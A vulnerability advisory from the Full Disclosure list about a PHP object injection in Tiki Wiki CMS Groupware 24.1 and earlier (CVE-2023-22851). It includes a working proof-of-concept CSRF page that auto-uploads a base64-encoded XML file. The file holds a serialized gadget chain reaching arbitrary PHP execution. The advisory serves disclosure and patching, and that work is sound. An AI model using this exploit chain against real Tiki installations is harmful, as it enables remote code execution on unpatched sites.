[KIS-2023-04] Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability

[Egidio Romano <research () karmainsecurity com>]

----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP 
Object Injection Vulnerability
----------------------------------------------------------------------------------------------------


[-] Software Link:

https://tiki.org


[-] Affected Versions:

Version 24.1 and prior versions.


[-] Vulnerability Description:

The vulnerability is located in the 
/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when 
importing data from WordPress sites through the Tiki Importer, user 
input passed through the uploaded XML file is being used in a call to 
the unserialize() PHP function. This can be exploited by malicious users 
to inject arbitrary PHP objects into the application scope, allowing 
them to perform a variety of attacks, such as executing arbitrary PHP 
code. Successful exploitation of this vulnerability requires an admin 
account (specifically, the ‘tiki_p_admin_importer’ permission). However, 
due to the CSRF vulnerability described in KIS-2023-01, this 
vulnerability might also be exploited by tricking a victim user into 
opening a web page like the following:

<html>
 <form action="http://localhost/tiki/tiki-importer.php"; method="POST" 
enctype="multipart/form-data">
  <input type="hidden" name="importerClassName" 
value="TikiImporter_Blog_Wordpress" />
  <input type="hidden" name="importAttachments" value="on" />
  <input type="file" name="importFile" id="fileinput"/>
 </form>
 <script>
  const xmlContent = 
atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw
ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
  const fileInput = document.getElementById("fileinput");
  const dataTransfer = new DataTransfer();
  const file = new File([xmlContent], "test.xml", {type: "text/xml"});
  dataTransfer.items.add(file);
  fileInput.files = dataTransfer.files;
  document.forms[0].submit();
 </script>
</html>


[-] Solution:

Upgrade to version 24.2 or later.


[-] Disclosure Timeline:

[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-22851 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2023-04

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/